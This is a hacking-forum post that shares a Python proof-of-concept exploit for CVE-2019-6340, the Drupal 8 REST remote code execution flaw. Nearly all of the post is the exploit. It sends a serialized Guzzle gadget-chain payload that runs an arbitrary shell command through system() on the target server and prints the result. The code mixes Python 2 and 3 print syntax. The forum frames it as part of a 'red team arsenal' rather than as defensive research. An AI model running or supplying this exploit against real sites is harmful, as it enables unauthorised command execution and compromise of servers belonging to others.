黑客仓库

最全面知识的黑客论坛,全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库,您可以在我们的论坛板块进行交流和学习。

立即注册账号!
Shacker

POC CVE-2019-6340

Shacker已验证会员

黑客倉庫站長

贡献: 21%
注册
09 10, 2024
消息
186
JavaScript:
import requests
import sys
import re

url = sys.argv[1]
url_dir = "/node/"
vuln_url = url + url_dir
print (r'''
   ______     ________    ___   ____ _______        __________ __ __  ____
  / ____/ |  / / ____/   |__ \ / __ <  / __ \      / ___/__  // // / / __ \
 / /    | | / / __/________/ // / / / / /_/ /_____/ __ \ /_ </ // /_/ / / /
/ /___  | |/ / /__/_____/ __// /_/ / /\__, /_____/ /_/ /__/ /__  __/ /_/ /
\____/  |___/_____/    /____/\____/_//____/      \____/____/  /_/  \____/ 
                                                                          

Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340

                         jas502n
''')
print ("\n\nExample: python CVE-2019-6340.py url cmd\n")
print (">>>Vuln Url=%s" % vuln_url)

querystring = {"_format":"hal_json"}
cmd = sys.argv[2]
cmd_lenght = len(cmd)
payload = "{\r\n  \"link\": [\r\n    {\r\n      \"value\": \"link\",\r\n      \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n    }\r\n  ],\r\n  \"_links\": {\r\n    \"type\": {\r\n      \"href\": \"http://localhost/rest/type/shortcut/default\"\r\n    }\r\n  }\r\n}" % (cmd_lenght,cmd)

proxies = {"http": "http://127.0.0.1:8080","https": "http://127.0.0.1:8080"}
headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    'Connection': "close",
    'Content-Type': "application/hal+json",
    'Accept': "*/*",
    'Cache-Control': "no-cache"
    }

response = requests.request("POST", vuln_url, data=payload, headers=headers, proxies=proxies, params=querystring)
# print(response.text)
if response.status_code==403 and "u0027access" in response.text :
    print ("\n>>>>Exit CVE-2019-6340 RCE Vuln!\n")
    m = re.findall('.*permissions."}(.*)',response.text,re.S)
    print m[0]
      
else:
    print ("No Vuln Exit!")
 
后退
顶部